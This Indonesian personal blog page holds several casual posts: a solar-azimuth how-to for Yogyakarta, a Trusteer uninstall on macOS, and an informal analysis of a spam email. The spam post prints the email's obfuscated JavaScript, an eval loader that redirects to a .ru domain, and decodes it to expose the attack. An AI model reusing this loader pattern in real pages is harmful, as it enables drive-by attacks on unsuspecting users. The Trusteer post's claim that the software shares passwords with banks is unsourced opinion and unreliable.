Cara Menentukan Solar Azimuth Yogjakarta (atau dimanapun kamu berada)

Apa itu Solar Azimuth?

Sudut azimuth adalah sudut matahari yang mendefinisikan arah datangnya radiasi matahari, sedangkan sudut zenith matahari atau elevasi surya mendefinisikan seberapa tinggi matahari. (Elevasi adalah bagian dari zenit.) Ada beberapa konvensi untuk azimuth matahari, namun secara tradisional didefinisikan sebagai sudut antara garis lintang selatan dan bayangan batang vertikal bumi. Konvensi ini menyatakan sudut adalah positif jika datang dari garis timur (condong ke selatan) dan negatif jika datang dari barat (condong ke selatan). Hitungan ini berdasar pada asumsi dasar matematika (sebab jika memakai asumsi dasar navigasi, akan menggunakan basis Utara/Selatan sebagai patokannya.
Misalnya karena timur akan menjadi 90 ° dan barat karena akan menjadi -90°.

Ada pula anggapan lain sebaliknya; Yaitu memakai asumsi navigasi. Jika arah asal adalah maka diambil langkah-langkah pendifinisian memakai sudut searah jarum jam. Sehingga timur menjadi negatif dan barat menjadi positif.

Namun, karena tradisi, yang paling umum diterima konvensi untuk menganalisis radiasi matahari (misalnya untuk analisa radiasi sebagai bahan energi surya) dipakai analisa searah jarum jam dari utara, sehingga timur adalah 90 °, selatan menjadi 180 ° dan barat adalah 270 °. Ini adalah definisi yang digunakan oleh National Renewable Energy Laboratory (Laboratorium Nasional Energi Yang Dapat Diperbaharui di colorado US) dalam perhitungan kalkulator posisi matahari mereka.

Dalam bahasa Indonesia sederhana, solar azimuth kira-kira adalah waktu terbit dan tenggelamnya matahari

Mengapa butuh penentuan solar azimuth?

  1. Jika kamu hobi beribadah dan butuh panduan matahari sebagai sarana penentuan waktu ibadah
  2. Jika kamu mau tahu kenapa matahari tenggelam suka pindah-pindah (seperti kejadian ketika saya, Almas dan Piere suatu sore di teluk Ambon. Almas berkata “Bang mataharinya biasanya tenggelam di laut, saya bingung kenapa mataharinya sekarang pindah tenggelam di balik bukit”. Untung bukit itu tidak jauh dari laut. Kalau jauh, saya bisa jadi menyarankan Almas segera ke tukang kacamata)
  3. Jika kamu iseng
  4. Jika kamu kesasar dan butuh panduan matahari
  5. Jika kamu riset dan suka naik gunung
  6. Jika kamu mau membuat pembangkit listrik tenaga matahari
  7. Jika kamu tidak punya kerjaan dan tiba-tiba rindu dengan makna hidup ini dan mendengar lagu Padi yang dikarang Piyu “Bayangkanlah bila aku terpisah jauh darimu. Bayangkanlah bila mentari tak mampu lagi menyinari dunia.”

Bagaimana cara menentukan solar azimuth Yogjakarta (atau dimanapun kamu berada)?

  1. Pergi ke Sun path chart program buatan Universitas Oregon
  2. Isi pertanyaan "Use these values:" Dengan latitude -7.7972 dan longitude 110.368 (Kenapa? Karena berdasarkan data itulah lokasi Daerah Istimewa Jogjakarta. Kalau lokasi kamu tidak ada dalam data tersebut, maka ikutilah petunjuk Mang Gugel dalam menentukan kordinat)
  3. Isi pertanyaan "Specify time zone" dengan jawaban UTC+7. Kenapa +7? Karena katanya Bang Roma berjudi itu haram (kalo kalah ama bandar). Tapi sebenarnya Jogja adalah UTC+7 karena itu adalah standar Greenwich Mean Time berdasarkan data local time. (*Situ nggak setuju dengan angka +7? Kalo berani bikin aja sendiri*)
  4. Isi pertanyaan "Choose data to be plotted" dengan "Plot dates 30 or 31 days apart, between solstices, December through June" kalau mau melihat data datangnya radiasi sinar matahari dari Desember sampai Juni. Kalau mau melihat dari bulan atau waktu tertentu lain, silahkan isi sendiri. banyak pilihannya kok.
  5. Isi pertanyaan "Set chart format parameters" dengan "Extend azimuth axis from 0° to 360°", "Extend elevation axis to 90°", "Show hours in international style". Jawaban lain akan dipilih dengan otomatis. Garis biru adalah kurva sinar matahari dan garis merah adalah jalur jam.
  6. Saya isi pertanyaan "Specify labeling options" dengan line 1 = A dan line 2 = B. Entah apa maksudnya, iseng aja biar gampang ngenalinnya nanti. Walopun ternyata ga berguna juga. Kampret.
  7. Di pertanyaan "Choose file format for chart" bisa output PDF bisa juga PNG. Terserah situ aja mana yang paling enak buat di print atau di simpan.

Hasil

Solar Azimuth Jogjakarta Solar Azimuth Jogjakarta

Cara baca

cara baca azimuth radiasi matahari jogjakarta

A = Timur B = Barat XXX = Rumah kamu (di jogja sana) Garis biru = arah matahari Garis merah = jam

Adakah cara lain?

Ada dong. Nah ini dia petunjuknya. Coba salah satunya:

  • Lihat di web time and date waktu terbit dan tenggelamnya matahari Jogja. Seting sendiri waktu yang dirasa pas. Sayangnya data yang keluar berupa angka. Nggak asoy geboy.
  • Datang langsung ke Jogjakarta dan lihat itu matahari kapan terbenam dan terbitnya.
  • Kalo nggak bisa dateng, coba telpon atau kontak sodara/teman atau siapalah yang tinggal di Jogja. Tanyain aja langsung ama mereka

Posted in data, edukasi, sistem, visual | Tagged , , , , , , , | 4 Comments

Uninstall trusteer di OSX

  1. Buka Terminal (cmd+spasi: ketik terminal)
  2. Kopi paste nih ayat: cd /Library/Rapport
  3. Trus kopi paste lagi ayat ini (daripada ngetik malesbanget, hehe): sudo ./RapportUninstaller.sh
  4. Ketik paswotnya (iya, paswot mac kamu, masak macgyver)

Udah deh, beres kaka

Nggak bisa juga? Itu artinya sialan dangkalan. Harus ikutin ini http://qr.net/kscsm (trus liat di Library masih ada folder Rapportnya atawa kaga)

Kalo kamu orangnya bukan parnoan (yang tidak ada hubungannya dengan panuan) dan/atau nggak punya relasi ama US/foreign bank dan/atau percaya bahwa omongannya #snowden cuman dongeng isepan jempol semata gara-gara tai laler di lehernya itu terlihat kurang seksi dan/atau nginstall trusteer di kompie dan kamu lalu bahagia dan percaya bahwa kamu terlindungi oleh semua mara bahaya dunia akhirat, maka santai aja. Kamu ga harus uninstall kok.

Kalo ngerjain peer dikit, kaka akan ngeliat banyak hal ajaib soal usaha keamanan mereka ini tapi kalo ngerjain peernya sambil sedikit ngupil maka kaka akan ngeliat: trusteer nyimpen pass dan berbagi ke jaringan bank mereka. Tiap orang boleh punya pendapat masing-masing. Pendapat aye.., bangke banget bank-bank gede US/foreign nakut-nakutin  dan lalu membuat pelanggan nginstall b*atch di kompie mereka.

Mentang-mentang gede, klakson sembarangan, huh! Belom pernah dikencingin orang sekampung kali yee?

Posted in edukasi, pasar, security | Tagged | 1 Comment

Macan Mati Kata Eko

Mana yang lebih benar?
A. Sastrawan bernama Pramudya Ananta Toer (almarhum) yang berkata bahwa menulis adalah bekerja untuk keabadian
B. Novelis Amerika, James Shelter, yang berkata ‘Menulislah atau Kau Musnah’
C. Pujangga wanita Emily Dickinson (1830-1886) yang bilang bahwa ia akan hidup abadi melalui puisi-puisinya

Jawabnya?

Jawabnya tidak penting. Hehe.

Kenapa? Sebab apapun pilihannya hasilnya sama, yaitu karya. Kata Eko teman saya, macan mati meninggalkan belang. Manusia mati (harusnya) meninggalkan karya. Jangan meninggalkan belang, sebab kamu bukan macan.

Hanya dengan karya kita berkomunikasi

Posted in geekjoke, komunikasi | Tagged , | 1 Comment

Pagi-pagi kok iseng, kamu spam aku? Dan akupun tak rela dimadu

Tadi pagi dapat email. Disuruh buka attachmentnya. Katanya kita disuruh donlot file berjenis HTM (pasti HTML) udah gitu disuruh buka pakai internet explorer. Hahaha… Buluketek, ini pasti spam. Tapi karena saya iseng pagi ini dan ada sedikit waktu. Mari bermain.

1. Ini kode mentahnya (yang pasti bukan lagu kode-nya Warkop DKI)

<html>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″>
<title>Please wait</title>
</head>
<body>
<h1><b> You will be forwarded… Wait please…</h1></b>
<h4>Internet Explorer compatible only! </h4><br>

<script>p=parseInt;ss=(1)?String.fromCharCode:0;asgq=”76!61!72!31!3d!34!3@!3b!a!76!61!72!32!3d!76!61!72!31!3b!a!6@!66!28!76!61!72!31!3d!3d!76!61!72!32!2@!20!7b!64!6f!63!75!6d!65!6e!74!2e!6c!6f!63!61!74!6@!6f!6e!3d!22!68!74!74!70!3a!2f!2f!68!6a!75!6@!6f!70!73!64!62!67!70!2e!72!75!3a!38!30!38!30!2f!66!6f!72!75!6d!2f!6c!6@!6e!6b!73!2f!63!6f!6c!75!6d!6e!2e!70!68!70!22!3b!7d”.replace(/@/g,”9″).split(“!”);try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=193;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window[“e”.concat(“v”+”al”)];}
s=””;if(zz)for(i=0;i-107!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}
if(zz)e(s);}}</script>

</body>
</html>

2. Mari dipecah. Selain hex, saya tidak memikirkan yang lain. Capek saya. Hidup saya sudah berat dan dipaksa harus memikirkan kode yang dibuat oleh pujangga lain, mati akuuh… (halah lebay, haha).
Ketika ada tulisan replace(/@/g,”9″)kalau begitu, semua yang ada tanda @ nya diganti jadi 9. Daripada susah-sudah mendingan pake tool find and replace. Hehe. Maklum, saya kan males banget orangnya. Maka hasilnya adalah cuma tiga angka yang pakai @:
2@ (lalu saya terjemahkan jadi 29)
3@ (lalu saya terjemahkan jadi 39)
6@ (lalu saya terjemahkan jadi 69)

3. Hasilnya adalah:

76!61!72!31!3d!34!39!3b!a!76!61!72!32!3d!76!61!72!31!3b!a!69!66!28!76!61!72!31!3d!3d!76!61!72!32!29!20!7b!64!6f!63!75!6d!65!6e!74!2e!6c!6f!63!61!74!69!6f!6e!3d!22!68!74!74!70!3a!2f!2f!68!6a!75!69!6f!70!73!64!62!67!70!2e!72!75!3a!38!30!38!30!2f!66!6f!72!75!6d!2f!6c!69!6e!6b!73!2f!63!6f!6c!75!6d!6e!2e!70!68!70!22!3b!7d

4. Karena ada nyanyian kode berlirik split(“!”), maka lagi lagi karena males saya ganti semua tanda ! jadi spasi. Lagi-lagi pake Edit > find and replace (kebetulan lagi pakai windows dan disana ada software canggih namanya notepad, jadi gampang. Tinggal mencet ctrl+H udah beres dah.

Hasil:
76 61 72 31 3d 34 39 3b a 76 61 72 32 3d 76 61 72 31 3b a 69 66 28 76 61 72 31 3d 3d 76 61 72 32 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 68 6a 75 69 6f 70 73 64 62 67 70 2e 72 75 3a 38 30 38 30 2f 66 6f 72 75 6d 2f 6c 69 6e 6b 73 2f 63 6f 6c 75 6d 6e 2e 70 68 70 22 3b 7d

5. Kelihatan kalau semua hasil dari notepad saya kopi paste dan masukkan ke http://www.string-functions.com/hex-string.aspx (darimana saya tahu ini angka hex? Bukan angka togel? Tentu saja dari Ascii Table, kakak :)  Kenapa pakai ASCII? Mungkin karena ia mau mencari wanita lain untuk dikawini. http://www.asciitable.com/ (//Makin ngaco saya. Apa hubungannya?)

6. Dapat alamat domain yaitu hjuiopsdbgp. Ini terjemahan hex nya:
var1=49;§f##×f#ºif(var1==var2) {document.location=”h t t p ://hjuiopsdbgp. ru:8080/forum/links/column.php”;}

7. Cek domain hjuiopsdbgp di urlquery. Ternyata banyak laporan kalau mereka ini spammer http://urlquery.net/report.php?id=1621594

8. Cek spam dan keamanan di Eye on Spam info collector. Sekedar cek en ricek konfirmasi, hehe. Benar juga, mereka memang spammer yang mengatasnamakan fax untuk perusahaan http://cbnetsecurity.com/colors/archives/2265

9. Minta teman-teman saya agar hjuiopsdbgp disuruh push-up sebentar biar sadar kalo mereka itu iseng banget sih pagi-pagi nyuruh saya mikir. Kalau hjuiopsdbgp masih iseng juga, nanti saya bilangin mamanya. Biar disetrap di pojok kebon belakang. Hehehe

 

(*Yeah, I know, misleading title. Hehe*)

Posted in security, spam | Tagged , , , | 1 Comment

Tulisan Anak SMP

Iya saya tahu saya tidak adil. Membandingkan dua anak SMP yang berbeda. Mereka dipisahkan oleh lokasi geografis, kultur bahkan mungkin cara mengikat tali sepatu.

Anak pertama, menulis mengenai keamanan jaringan komputer dan kelemahan yang terkandung didalamnya dengan banyak sekali referensi daftar pustaka. Kelihatan sekali obsesinya di dunia jaringan keamanan komputer telah tertata baik sejak usia dini. Ini buktinya (kalau diklik menuju link asli):

x1_92e1d7e

Anak kedua, menulis juga obsesinya. Yaitu masuk surga. Ini buktinya (kalau diklik menuju link asli):

anak SMP yang terobsesi masuk surga

Diatas, dua-duanya, adalah tulisan anak SMP. Orangnya berbeda.

Tidak adil memang membandingkan sebuah karya ilmiah dengan tulisan curahan hati (yang dipenuhi gambar hati – literal). Tapi dari bukti ini, kadang bertanya saya pada diri sendiri, apa yang harus dilakukan untuk membantu anak SMP kedua (yang jelas-jelas dari Indonesia) agar menjadi lebih baik pendidikannya?

Atau minimal, bisa membantu dia untuk berkhayal lebih variatif daripada sekedar membayangkan pocong dan hati yang luka?

(*Atau memang saya yang harus sadar, bahwa di dunia ini ada manusia yang hanya butuh cerita hantu dan romansa untuk bertahan hidup dari hari ke hari?*)

Posted in data, edukasi, security, server | Tagged , , , | 1 Comment